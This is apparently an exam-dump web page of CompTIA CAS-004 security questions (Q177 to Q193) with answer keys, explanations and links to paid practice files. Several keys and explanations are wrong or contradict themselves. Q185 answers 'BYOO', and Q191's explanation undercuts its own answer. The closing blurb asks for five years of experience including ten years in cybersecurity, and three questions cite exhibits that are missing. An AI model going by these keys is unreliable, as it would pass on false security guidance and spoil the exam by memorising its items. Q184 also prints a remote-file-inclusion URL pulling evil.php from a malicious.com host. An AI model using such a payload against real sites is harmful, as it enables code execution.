CAS-004 Questions - Truly Beneficial For Your CompTIA Exam (Updated 445 Questions) [Q177-Q193]

Share

CAS-004 Questions - Truly Beneficial For Your CompTIA Exam (Updated 445 Questions)

View All CAS-004 Actual Exam Questions, Answers and Explanations for Free


CompTIA CAS-004 certification exam is challenging, and candidates need to have a deep understanding of cybersecurity concepts and technologies to pass the exam. However, passing the certification exam can provide IT professionals with a competitive edge in the job market and open up new career opportunities. Overall, the CompTIA CAS-004 certification exam is an excellent choice for IT professionals who want to advance their careers in the cybersecurity field.

 

NEW QUESTION # 177
An organization that provides a SaaS solution recently experienced an incident involving customer data loss. The system has a level of self-healing that includes monitoring performance and available resources. When the system detects an issue, the self-healing process is supposed to restart parts of the software.
During the incident, when the self-healing system attempted to restart the services, available disk space on the data drive to restart all the services was inadequate. The self-healing system did not detect that some services did not fully restart and declared the system as fully operational.
Which of the following BEST describes the reason why the silent failure occurred?

  • A. The number of nodes in the self-healing cluster was healthy.
  • B. The disk utilization alarms are higher than what the service restarts require.
  • C. Conditional checks prior to the service restart succeeded.
  • D. The system logs rotated prematurely.

Answer: C


NEW QUESTION # 178
A security engineer is re-architecting a network environment that provides regional electric distribution services. During a pretransition baseline assessment, the engineer identified the following security-relevant characteristics of the environment:
* Enterprise IT servers and supervisory industrial systems share the same subnet.
* Supervisory controllers use the 750MHz band to direct a portion of fielded PLCs.
* Command and telemetry messages from industrial control systems are unencrypted and unauthenticated.
Which of the following re-architecture approaches would be best to reduce the company's risk?

  • A. Implement a one-way guard between enterprise IT services and mission-critical systems, obfuscate legitimate RF signals by broadcasting noise, and implement modern protocols to authenticate ICS messages.
  • B. Segment supervisory controllers from field PLCs, disconnect the entire network from the internet, and use only the 750MHz link for controlling energy distribution services.
  • C. Characterize safety-critical versus non-safety-critical systems, isolate safety-critical systems from other systems, and increase the directionality of RF links in the field.
  • D. Create a new network segment for enterprise IT servers, configure NGFW to enforce a well-defined segmentation policy, and implement a WIDS to monitor the spectrum.

Answer: D

Explanation:
The best approach to reduce the company's risk is to segregate the enterprise IT servers and supervisory industrial systems. Creating a new network segment and using a Next-Generation Firewall (NGFW) to enforce a strict segmentation policy will help to isolate the systems and protect against potential attacks. Additionally, implementing a Wireless Intrusion Detection System (WIDS) can help monitor the spectrum for unauthorized devices or interference.


NEW QUESTION # 179
A company processes data subject to NDAs with partners that define the processing and storage constraints for the covered dat
a. The agreements currently do not permit moving the covered data to the cloud, and the company would like to renegotiate the terms of the agreements.
Which of the following would MOST likely help the company gain consensus to move the data to the cloud?

  • A. Designing data protection schemes to mitigate the risk of loss due to multitenancy
  • B. Emulating OS and hardware architectures to blur operations from CSP view
  • C. Implementing redundant stores and services across diverse CSPs for high availability
  • D. Purchasing managed FIM services to alert on detected modifications to covered data

Answer: D


NEW QUESTION # 180
An organization requires a contractual document that includes
* An overview of what is covered
* Goals and objectives
* Performance metrics for each party
* A review of how the agreement is managed by all parties
Which of the following BEST describes this type of contractual document?

  • A. NDA
  • B. BAA
  • C. ISA
  • D. SLA

Answer: D

Explanation:
A Service Level Agreement is a contract between a service provider and a customer that outlines the level of services to be provided, the metrics by which those services will be measured, and how the agreement will be managed by both parties. SLAs also include provisions for dispute resolution and for the termination of the agreement.
Reference: CompTIA Advanced Security Practitioner (CASP+) Study Guide: Chapter 5: Security Testing, Section 5.7: Service Level Agreements.


NEW QUESTION # 181
A cloud security architect has been tasked with selecting the appropriate solution given the following:
* The solution must allow the lowest RTO possible.
* The solution must have the least shared responsibility possible.
* Patching should be a responsibility of the CSP.
Which of the following solutions can BEST fulfill the requirements?

  • A. Paas
  • B. Saas
  • C. laas
  • D. Private

Answer: B

Explanation:
SaaS, or software as a service, is the solution that can best fulfill the requirements of having the lowest RTO possible, the least shared responsibility possible, and patching as a responsibility of the CSP. SaaS is a cloud service model that provides users with access to software applications hosted and managed by the CSP over the internet. SaaS has the lowest RTO (recovery time objective), which is the maximum acceptable time for restoring a system or service after a disruption, because it does not require any installation, configuration, or maintenance by the users. SaaS also has the least shared responsibility possible because most of the security aspects are handled by the CSP, such as patching, updating, backup, encryption, authentication, etc.


NEW QUESTION # 182
When implementing a penetration testing program, the Chief Information Security Officer (CISO) designates different organizational groups within the organization as having different responsibilities, attack vectors, and rules of engagement. First, the CISO designates a team to operate from within the corporate environment. This team is commonly referred to as:

  • A. the read team.
  • B. the white team.
  • C. the blue team.
  • D. the development team.
  • E. the operations team.

Answer: B


NEW QUESTION # 183
A software company is developing an application in which data must be encrypted with a cipher that requires the following:
* Initialization vector
* Low latency
* Suitable for streaming
Which of the following ciphers should the company use?

  • A. Cipher block chaining message authentication code
  • B. Electronic codebook
  • C. Cipher block chaining
  • D. Cipher feedback

Answer: D

Explanation:
B) Cipher block chaining message authentication code (CBC-MAC) is a mode of operation for block ciphers that provides both encryption and authentication. CBC-MAC uses an IV and a block cipher to encrypt the plaintext and generate a MAC value that is appended to the ciphertext. CBC-MAC has high latency because it requires the entire message to be processed before generating the MAC value. CBC-MAC is not suitable for streaming data because it requires padding and block synchronization.
C) Cipher block chaining (CBC) is a mode of operation for block ciphers that provides encryption only. CBC uses an IV and a block cipher to encrypt each block of plaintext by XORing it with the previous ciphertext block. CBC has high latency because it requires a full block of plaintext before encryption. CBC is not suitable for streaming data because it requires padding and block synchronization.
D) Electronic codebook (ECB) is a mode of operation for block ciphers that provides encryption only. ECB uses a block cipher to encrypt each block of plaintext independently. ECB has low latency because it can encrypt each block of plaintext as soon as it arrives. However, ECB is not suitable for streaming data because it requires padding and block synchronization. Moreover, ECB is insecure because it does not use an IV and produces identical ciphertext blocks for identical plaintext blocks.
Explanation:
Cipher feedback (CFB) is a mode of operation for block ciphers that allows them to encrypt streaming data. CFB uses an initialization vector (IV) and a block cipher to generate a keystream that is XORed with the plaintext to produce the ciphertext. CFB has low latency because it can encrypt each byte or bit of plaintext as soon as it arrives, without waiting for a full block. CFB is suitable for streaming data because it does not require padding or block synchronization.


NEW QUESTION # 184
A security engineer notices the company website allows users following example:
hitps://mycompany.com/main.php?Country=US
Which of the following vulnerabilities would MOST likely affect this site?

  • A. SQL injection
  • B. Directory traversal -
  • C. Remote file inclusion
  • D. Unsecure references

Answer: C

Explanation:
Remote file inclusion (RFI) is a web vulnerability that allows an attacker to include malicious external files that are later run by the website or web application12. This can lead to code execution, data theft, defacement, or other malicious actions. RFI typically occurs when a web application dynamically references external scripts using user-supplied input without proper validation or sanitization23.
In this case, the website allows users to specify a country parameter in the URL that is used to include a file from another domain. For example, an attacker could craft a URL like this:
https://mycompany.com/main.php?Country=https://malicious.com/evil.php
This would cause the website to include and execute the evil.php file from the malicious domain, which could contain any arbitrary code3.


NEW QUESTION # 185
The Chief information Officer (CIO) wants to implement enterprise mobility throughout the organization. The goal is to allow employees access to company resources. However the CIO wants the ability to enforce configuration settings, manage data, and manage both company-owned and personal devices. Which of the following should the CIO implement to achieve this goal?

  • A. COPE
  • B. BYOO
  • C. MDM
  • D. CYOD

Answer: B


NEW QUESTION # 186
A customer reports being unable to connect to a website at www.test.com to consume services. The customer notices the web application has the following published cipher suite:

Which of the following is the MOST likely cause of the customer's inability to connect?

  • A. The public key should be using ECDSA.
  • B. The server name should be test.com.
  • C. Weak ciphers are being used.
  • D. The default should be on port 80.

Answer: C


NEW QUESTION # 187
An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment's notice.
Which of the following should the organization consider FIRST to address this requirement?

  • A. Identify critical business processes and determine associated software and hardware requirements.
  • B. Implement a change management plan to ensure systems are using the appropriate versions.
  • C. Hire additional on-call staff to be deployed if an event occurs.
  • D. Design an appropriate warm site for business continuity.

Answer: A

Explanation:
When developing a plan, the first thing to consider is the business process and their impact on operations. A warm site does not make sense even if it were to be first, as a warm site does not replicate in a manner that provides "moments notice" fail over.


NEW QUESTION # 188
The Chief information Officer (CIO) of a large bank, which uses multiple third-party organizations to deliver a service, is concerned about the handling and security of customer data by the parties. Which of the following should be implemented to BEST manage the risk?

  • A. Establish a review committee that assesses the importance of suppliers and ranks them according to contract renewals. At the time of contract renewal, incorporate designs and operational controls into the contracts and a right-to-audit clause. Regularly assess the supplier's post-contract renewal with a dedicated risk management team.
  • B. Establish an audit program that regularly reviews all suppliers regardless of the data they access, how they access the data, and the type of data, Review all design and operational controls based on best practice standard and report the finding back to upper management.
  • C. Establish a team using members from first line risk, the business unit, and vendor management to assess only design security controls of all suppliers. Store findings from the reviews in a database for all other business units and risk teams to reference.
  • D. Establish a governance program that rates suppliers based on their access to data, the type of data, and how they access the data Assign key controls that are reviewed and managed based on the supplier's rating. Report finding units that rely on the suppliers and the various risk teams.

Answer: A


NEW QUESTION # 189
A security analyst discovered that the company's WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests:

Which of the following would BEST mitigate this vulnerability?

  • A. Input validation
  • B. CAPTCHA
  • C. Data encoding
  • D. Network intrusion prevention

Answer: A


NEW QUESTION # 190
A major broadcasting company that requires continuous availability to streaming content needs to be resilient against DDoS attacks Which of the following is the MOST important infrastructure security design element to prevent an outage7

  • A. Ensuring cloud autoscaling is in place
  • B. Leveraging content delivery network across multiple regions
  • C. Supporting heterogeneous architecture
  • D. Scaling horizontally to handle increases in traffic

Answer: B

Explanation:
Explanation
A content delivery network (CDN) is a distributed system of servers that delivers web content to users based on their geographic location, the origin of the content, and the performance of the network. A CDN can help improve the availability and performance of web applications by caching content closer to the users, reducing latency and bandwidth consumption. A CDN can also help mitigate distributed denial-of-service (DDoS) attacks by absorbing or filtering malicious traffic before it reaches the origin servers, reducing the impact on the application availability. Supporting heterogeneous architecture means using different types of hardware, software, or platforms in an IT environment. This can help improve resilience by reducing single points of failure and increasing compatibility, but it does not directly prevent DDoS attacks. Ensuring cloud autoscaling is in place means using cloud services that automatically adjust the amount of resources allocated to an application based on the demand or load. This can help improve scalability and performance by providing more resources when needed, but it does not directly prevent DDoS attacks. Scaling horizontally means adding more servers or nodes to an IT environment to increase its capacity or throughput. This can help improve scalability and performance by distributing the load across multiple servers, but it does not directly prevent DDoS attacks. References: [CompTIA Advanced Security Practitioner (CASP+) Certification Exam Objectives], Domain 2: Enterprise Security Architecture, Objective 2.4: Select controls based on systems security evaluation models


NEW QUESTION # 191
A company is implementing SSL inspection. During the next six months, multiple web applications that will be separated out with subdomains will be deployed. Which of the following will allow the inspection of the data without multiple certificate deployments?

  • A. Implement certificate pinning.
  • B. Use a third-party CA.
  • C. Create a wildcard certificate.
  • D. Include all available cipher suites.

Answer: C

Explanation:
A wildcard certificate is a public key certificate and can be used with multiple sub-domains of a domain. However, it cannot be used for now. The scenario states the company has to wait until 6 months later for the subdomains to be deployed.


NEW QUESTION # 192
A large number of emails have been reported, and a security analyst is reviewing the following information from the emails:

As part of the image process, which of the following is the FIRST step the analyst should take?

  • A. Ignore the emails, as SPF validation is successful, and it is a false positive
  • B. Compare the 'Return-Path" and "Received" fields.
  • C. Validate the final "Received" header against the DNS entry of the domain.
  • D. Block the email address carl b@comptia1 com, as it is sending spam to subject matter experts

Answer: B


NEW QUESTION # 193
......


The CASP+ certification exam is recommended for IT professionals with at least 5 years of experience in IT administration, including at least 10 years of experience in cybersecurity. CAS-004 exam consists of 90 multiple-choice and performance-based questions that test the candidate's knowledge in areas such as risk management, enterprise security architecture, research and collaboration, and integration of computing, communications, and business disciplines.

 

CAS-004 dumps Free Test Engine Verified By It Certified Experts: https://www.examprepaway.com/CompTIA/braindumps.CAS-004.ete.file.html

CAS-004 Exam Free Practice Test with100% Accurate Answers: https://drive.google.com/open?id=1q42WTNXKavJNieq6zlYGOcxhBZthxGRL